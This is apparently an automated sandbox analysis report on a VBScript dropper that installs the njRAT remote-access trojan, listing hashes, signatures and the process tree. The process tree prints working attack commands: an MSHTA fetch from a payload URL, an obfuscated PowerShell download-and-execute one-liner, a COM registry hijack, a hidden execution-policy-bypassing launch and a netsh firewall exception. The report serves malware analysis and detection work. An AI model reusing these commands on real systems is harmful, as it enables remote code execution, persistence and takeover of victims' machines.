Analysis
-
max time kernel
145s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
09-08-2022 19:01
Static task
static1
Behavioral task
behavioral1
Sample
ZURLRYOHRJILYWHHLBXSQO.vbs
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
ZURLRYOHRJILYWHHLBXSQO.vbs
Resource
win10v2004-20220721-en
General
-
Target
ZURLRYOHRJILYWHHLBXSQO.vbs
-
Size
1KB
-
MD5
5f15ed0b10945b58f1d89fd89e7816a2
-
SHA1
0912be608b29f1bb905f9758e5b791f43531fc3b
-
SHA256
b529175e6e3cd7badb222d3a863d034241489835759f9557d8e8aae52e562706
-
SHA512
3e92fc68eb3de3dd8373842c8f4566323299803425ff8a80764f40f762a0680b5d30aeabb9f7a3efb189ebd3c0594ca7c4292a3e26836955db81ad260a144cae
Malware Config
Extracted
https://tradeguru.com.pk/enc3.txt
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
MSHTA.EXEPOWERSHELL.exePOWERSHELL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3404 2292 MSHTA.EXE Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1156 2292 POWERSHELL.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3396 2292 POWERSHELL.exe -
Blocklisted process makes network request 3 IoCs
Processes:
MSHTA.EXEPOWERSHELL.exeflow pid process 8 3404 MSHTA.EXE 13 3404 MSHTA.EXE 15 1156 POWERSHELL.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3588 set thread context of 4468 3588 powershell.exe aspnet_compiler.exe -
Modifies registry class 4 IoCs
Processes:
reg.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ reg.exe Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} reg.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exepid process 1156 POWERSHELL.exe 1156 POWERSHELL.exe 4936 powershell.exe 4936 powershell.exe 3396 POWERSHELL.exe 3396 POWERSHELL.exe 3588 powershell.exe 3588 powershell.exe 3588 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exedescription pid process Token: SeDebugPrivilege 1156 POWERSHELL.exe Token: SeDebugPrivilege 4936 powershell.exe Token: SeDebugPrivilege 3396 POWERSHELL.exe Token: SeIncreaseQuotaPrivilege 4936 powershell.exe Token: SeSecurityPrivilege 4936 powershell.exe Token: SeTakeOwnershipPrivilege 4936 powershell.exe Token: SeLoadDriverPrivilege 4936 powershell.exe Token: SeSystemProfilePrivilege 4936 powershell.exe Token: SeSystemtimePrivilege 4936 powershell.exe Token: SeProfSingleProcessPrivilege 4936 powershell.exe Token: SeIncBasePriorityPrivilege 4936 powershell.exe Token: SeCreatePagefilePrivilege 4936 powershell.exe Token: SeBackupPrivilege 4936 powershell.exe Token: SeRestorePrivilege 4936 powershell.exe Token: SeShutdownPrivilege 4936 powershell.exe Token: SeDebugPrivilege 4936 powershell.exe Token: SeSystemEnvironmentPrivilege 4936 powershell.exe Token: SeRemoteShutdownPrivilege 4936 powershell.exe Token: SeUndockPrivilege 4936 powershell.exe Token: SeManageVolumePrivilege 4936 powershell.exe Token: 33 4936 powershell.exe Token: 34 4936 powershell.exe Token: 35 4936 powershell.exe Token: 36 4936 powershell.exe Token: SeDebugPrivilege 3588 powershell.exe Token: SeIncreaseQuotaPrivilege 4936 powershell.exe Token: SeSecurityPrivilege 4936 powershell.exe Token: SeTakeOwnershipPrivilege 4936 powershell.exe Token: SeLoadDriverPrivilege 4936 powershell.exe Token: SeSystemProfilePrivilege 4936 powershell.exe Token: SeSystemtimePrivilege 4936 powershell.exe Token: SeProfSingleProcessPrivilege 4936 powershell.exe Token: SeIncBasePriorityPrivilege 4936 powershell.exe Token: SeCreatePagefilePrivilege 4936 powershell.exe Token: SeBackupPrivilege 4936 powershell.exe Token: SeRestorePrivilege 4936 powershell.exe Token: SeShutdownPrivilege 4936 powershell.exe Token: SeDebugPrivilege 4936 powershell.exe Token: SeSystemEnvironmentPrivilege 4936 powershell.exe Token: SeRemoteShutdownPrivilege 4936 powershell.exe Token: SeUndockPrivilege 4936 powershell.exe Token: SeManageVolumePrivilege 4936 powershell.exe Token: 33 4936 powershell.exe Token: 34 4936 powershell.exe Token: 35 4936 powershell.exe Token: 36 4936 powershell.exe Token: SeIncreaseQuotaPrivilege 4936 powershell.exe Token: SeSecurityPrivilege 4936 powershell.exe Token: SeTakeOwnershipPrivilege 4936 powershell.exe Token: SeLoadDriverPrivilege 4936 powershell.exe Token: SeSystemProfilePrivilege 4936 powershell.exe Token: SeSystemtimePrivilege 4936 powershell.exe Token: SeProfSingleProcessPrivilege 4936 powershell.exe Token: SeIncBasePriorityPrivilege 4936 powershell.exe Token: SeCreatePagefilePrivilege 4936 powershell.exe Token: SeBackupPrivilege 4936 powershell.exe Token: SeRestorePrivilege 4936 powershell.exe Token: SeShutdownPrivilege 4936 powershell.exe Token: SeDebugPrivilege 4936 powershell.exe Token: SeSystemEnvironmentPrivilege 4936 powershell.exe Token: SeRemoteShutdownPrivilege 4936 powershell.exe Token: SeUndockPrivilege 4936 powershell.exe Token: SeManageVolumePrivilege 4936 powershell.exe Token: 33 4936 powershell.exe -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.execmd.execmd.exepowershell.exeaspnet_compiler.exedescription pid process target process PID 1156 wrote to memory of 4936 1156 POWERSHELL.exe powershell.exe PID 1156 wrote to memory of 4936 1156 POWERSHELL.exe powershell.exe PID 4936 wrote to memory of 5056 4936 powershell.exe WScript.exe PID 4936 wrote to memory of 5056 4936 powershell.exe WScript.exe PID 3396 wrote to memory of 1160 3396 POWERSHELL.exe cmd.exe PID 3396 wrote to memory of 1160 3396 POWERSHELL.exe cmd.exe PID 1160 wrote to memory of 1216 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1216 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1284 1160 cmd.exe reg.exe PID 1160 wrote to memory of 1284 1160 cmd.exe reg.exe PID 1160 wrote to memory of 4980 1160 cmd.exe cmd.exe PID 1160 wrote to memory of 4980 1160 cmd.exe cmd.exe PID 4980 wrote to memory of 3588 4980 cmd.exe powershell.exe PID 4980 wrote to memory of 3588 4980 cmd.exe powershell.exe PID 3588 wrote to memory of 4468 3588 powershell.exe aspnet_compiler.exe PID 3588 wrote to memory of 4468 3588 powershell.exe aspnet_compiler.exe PID 3588 wrote to memory of 4468 3588 powershell.exe aspnet_compiler.exe PID 3588 wrote to memory of 4468 3588 powershell.exe aspnet_compiler.exe PID 3588 wrote to memory of 4468 3588 powershell.exe aspnet_compiler.exe PID 3588 wrote to memory of 4468 3588 powershell.exe aspnet_compiler.exe PID 3588 wrote to memory of 4468 3588 powershell.exe aspnet_compiler.exe PID 3588 wrote to memory of 4468 3588 powershell.exe aspnet_compiler.exe PID 4468 wrote to memory of 2748 4468 aspnet_compiler.exe netsh.exe PID 4468 wrote to memory of 2748 4468 aspnet_compiler.exe netsh.exe PID 4468 wrote to memory of 2748 4468 aspnet_compiler.exe netsh.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ZURLRYOHRJILYWHHLBXSQO.vbs"1⤵
-
C:\Windows\system32\MSHTA.EXEMSHTA.EXE https://tradeguru.com.pk/enc3.txt1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HAAEOALBRXAIOCSRBGSCEDW = '[\<5<_!]70#&-5)7@5(59]4y\<5<_!]70#&-5)7@5(59]4t(_*)})-[*\[/(%/0^!%{(@<{3%\$}7!6&14]}&1*=57[.IO.\<5<_!]70#&-5)7@5(59]4t_13[9$#[<1/}#^#2^8$$[)(_*)})-[*\[/(%/0^!%{(@]61=$}4}}4^7<*&/@!%+\}<{3%\$}7!6&14]}&1*=57[_13[9$#[<1/}#^#2^8$$[)(_*)})-[*\[/(%/0^!%{(@]61=$}4}}4^7<*&/@!%+\}d(_*)})-[*\[/(%/0^!%{(@_13[9$#[<1/}#^#2^8$$[)]'.Replace('\<5<_!]70#&-5)7@5(59]4','S').Replace('(_*)})-[*\[/(%/0^!%{(@','E').Replace('_13[9$#[<1/}#^#2^8$$[)','R').Replace(']61=$}4}}4^7<*&/@!%+\}','A').Replace('<{3%\$}7!6&14]}&1*=57[','M');$HLTYLQWQUSUZZXXCFYGBYAD = ($HAAEOALBRXAIOCSRBGSCEDW -Join '')|&('I'+'EX');$HZJDPHHLCFDWDOVEILVRHQQ = '[07^[^&[4<5=268_/]+1(-!y07^[^&[4<5=268_/]+1(-!02=(]2+25)4/&*#[$2}36<_/$_4}0]/-)5%[/3\9@76@m.N_/$_4}0]/-)5%[/3\9@76@02=(]2+25)4/&*#[$2}36<.W_/$_4}0]/-)5%[/3\9@76@bR_/$_4}0]/-)5%[/3\9@76@qu_/$_4}0]/-)5%[/3\9@76@07^[^&[4<5=268_/]+1(-!02=(]2+25)4/&*#[$2}36<]'.Replace('07^[^&[4<5=268_/]+1(-!','S').Replace('_/$_4}0]/-)5%[/3\9@76@','E').Replace('02=(]2+25)4/&*#[$2}36<','T');$HGWVOWBJIRKOZPAZDHKCXFR = ($HZJDPHHLCFDWDOVEILVRHQQ -Join '')|&('I'+'EX');$HATKNHVTWEYFZVGJTJKPOJF = '<&]4^<529_}0((#90_50&$r0*)$60%](_0*8%7$%{4&\_a[#}02[3_+}(*7!^3}[*#350*)$60%](_0*8%7$%{4&\_'.Replace('<&]4^<529_}0((#90_50&$','C').Replace('0*)$60%](_0*8%7$%{4&\_','E').Replace('[#}02[3_+}(*7!^3}[*#35','T');$HIGJPHAPDSYPKOSVELGREOR = '<2!\3]6!6<&_+7)[9)}\/^<+8]/@<9<^(+${/4-7%@)(tR<+8]/@<9<^(+${/4-7%@)(1*)9%/*/(56%3__7\}!\11pon1*)9%/*/(56%3__7\}!\11<+8]/@<9<^(+${/4-7%@)('.Replace('<2!\3]6!6<&_+7)[9)}\/^','G').Replace('<+8]/@<9<^(+${/4-7%@)(','E').Replace('1*)9%/*/(56%3__7\}!\11','S');$HRFXTROBLKIFECVKROLDLJL = 'G&/+0%*9_1+*1&)^)2$3<+(t(+<</9]!8<4(%}5)_9!{*7&/+0%*9_1+*1&)^)2$3<+(21{}\5[($(]@_+8_\1+1\%pon21{}\5[($(]@_+8_\1+1\%&/+0%*9_1+*1&)^)2$3<+(21{}\5[($(]@_+8_\1+1\%t(+<</9]!8<4(%}5)_9!{*7&/+0%*9_1+*1&)^)2$3<+(am'.Replace('21{}\5[($(]@_+8_\1+1\%','S').Replace('&/+0%*9_1+*1&)^)2$3<+(','E').Replace('(+<</9]!8<4(%}5)_9!{*7','R');$HPLYZILQXYLUTLCHOFQSIZE = '}_5)50/8//-/@10^)<{_$(\/5+^${{)\1@]!}04*@126a}&%406_!1]{7-7^%}&%50[To\/5+^${{)\1@]!}04*@126n}&%406_!1]{7-7^%}&%50['.Replace('}_5)50/8//-/@10^)<{_$(','R').Replace('\/5+^${{)\1@]!}04*@126','E').Replace('}&%406_!1]{7-7^%}&%50[','D');&('I'+'EX')($HLTYLQWQUSUZZXXCFYGBYAD::new($HGWVOWBJIRKOZPAZDHKCXFR::$HATKNHVTWEYFZVGJTJKPOJF('https://tradeguru.com.pk/Server3.txt').$HIGJPHAPDSYPKOSVELGREOR().$HRFXTROBLKIFECVKROLDLJL()).$HPLYZILQXYLUTLCHOFQSIZE())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.ps1'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.vbs"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE6⤵
- Modifies Windows Firewall
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1Filesize
604KB
MD5ab1fce3ab2f6f211da8f8dc30c2b3060
SHA1ae0dff660b20f9209a66029d44b048a63cc80336
SHA2567cb280def1092d641ad3449dd05713c155788034c6e1649d423039c867b562ca
SHA512ed741014733c2bf70bb82e539324a3a8ebca5b56a427675c9ce7ffdbb28d4f113c2d20e6a083ba8580d891e2586190842d6cea1b7cfb5450af02a694b14b5b85
-
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.batFilesize
706B
MD51a2189e850187ca0cfadf5eba71bf87b
SHA1022de59e2f7a4ada62a34c701d35a8f6b738a140
SHA256d19e4c732fd1125438cb1d7e2278d9420fad7d3e66fcc6c56879258364664997
SHA5129acf6053091a18388b9da45ea7147b71bbeb3acda7697d311ce9a416578595427ec3661a41c09abed75ae155d11c15b3573883effa25eeb86cfbf93eb515d49d
-
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.ps1Filesize
3KB
MD51fe311d146874fa10f4eedf9941dabd4
SHA14ea8f6f1fcc57a1cba5b388e11df6c3a58fc9709
SHA256804d3783e70a5a575eeb0e7d617186bd1f8dcbd3244a736521194948fa80ea1d
SHA5127a70c224d707ff7a723daa86ded140987fbf52d38a2c1cdacc1d04c53c447b78fa5cb49843eeebf126fa95cb72b44f436581b383ebde645ab53105d5f8fc74bb
-
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.vbsFilesize
1KB
MD58b0c7083e7b7bb3a886e13dcd0830ba9
SHA1444748aad7b9289f1b371aaac955c0554ca62d17
SHA25645bbe8aafd1246fa15881a63f3cb8997a35cfc3e78ba306fc5abbaf72cf2867e
SHA512d23a9aa4d91231b26eca8c61a6487e9f151be19a45ce7a8bfb818ebd16803cfad219ae594cfb57263e7044e9f73d3705239267345f0e03a7e478f196938d3c89
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.logFilesize
3KB
MD500e7da020005370a518c26d5deb40691
SHA1389b34fdb01997f1de74a5a2be0ff656280c0432
SHA256a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe
SHA5129a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5c14cfe9cceee0b2fa2f4d0638215f4b7
SHA15895dd3fcff705cd16caba80ecc28edb67591fe0
SHA2569a6678bda60018ea04abbd3a5569f2349a4e9a1d533d150e030197330a5ec02b
SHA512c9b31f7914e4ee36306aed9625188c45e820e94ccd542a63a0ce73f19989eaa699e407a74db0c66fe7b6492b9564cd7d0c078ff044be20ea5f700a864577428c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5bc34f67b09ef76be9c393b6fb6508a35
SHA17c59c76b6afb72f268e07e1c8ec7dd7f3860ebdb
SHA2568d8540e29fff09fbed6d44d34adbe5c89c005a6c7b44426dce62dcdd1bd414c6
SHA5124a0ffb8c01a44edd58d92473a2b1fe169dd669d4821b7bc0617f03f1b646788a7db76f4c08b447f87a54c787d49b90560e0f97bccf88019e68300d5ddeeb387f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
memory/1156-131-0x000001A7D1E50000-0x000001A7D1E72000-memory.dmpFilesize
136KB
-
memory/1156-133-0x00007FFE78180000-0x00007FFE78C41000-memory.dmpFilesize
10.8MB
-
memory/1156-132-0x00007FFE78180000-0x00007FFE78C41000-memory.dmpFilesize
10.8MB
-
memory/1156-151-0x00007FFE78180000-0x00007FFE78C41000-memory.dmpFilesize
10.8MB
-
memory/1160-138-0x0000000000000000-mapping.dmp
-
memory/1216-140-0x0000000000000000-mapping.dmp
-
memory/1284-141-0x0000000000000000-mapping.dmp
-
memory/2748-161-0x0000000000000000-mapping.dmp
-
memory/3396-144-0x00007FFE78180000-0x00007FFE78C41000-memory.dmpFilesize
10.8MB
-
memory/3396-157-0x00007FFE78180000-0x00007FFE78C41000-memory.dmpFilesize
10.8MB
-
memory/3588-155-0x00007FFE78180000-0x00007FFE78C41000-memory.dmpFilesize
10.8MB
-
memory/3588-145-0x0000000000000000-mapping.dmp
-
memory/3588-150-0x00007FFE78180000-0x00007FFE78C41000-memory.dmpFilesize
10.8MB
-
memory/4468-159-0x0000000005430000-0x00000000059D4000-memory.dmpFilesize
5.6MB
-
memory/4468-153-0x000000000040BBBE-mapping.dmp
-
memory/4468-152-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/4468-158-0x0000000004DE0000-0x0000000004E7C000-memory.dmpFilesize
624KB
-
memory/4468-160-0x0000000004F40000-0x0000000004FD2000-memory.dmpFilesize
584KB
-
memory/4468-162-0x0000000005AD0000-0x0000000005ADA000-memory.dmpFilesize
40KB
-
memory/4468-163-0x0000000000B50000-0x0000000000BB6000-memory.dmpFilesize
408KB
-
memory/4936-143-0x00007FFE78180000-0x00007FFE78C41000-memory.dmpFilesize
10.8MB
-
memory/4936-147-0x00007FFE78180000-0x00007FFE78C41000-memory.dmpFilesize
10.8MB
-
memory/4936-134-0x0000000000000000-mapping.dmp
-
memory/4980-142-0x0000000000000000-mapping.dmp
-
memory/5056-136-0x0000000000000000-mapping.dmp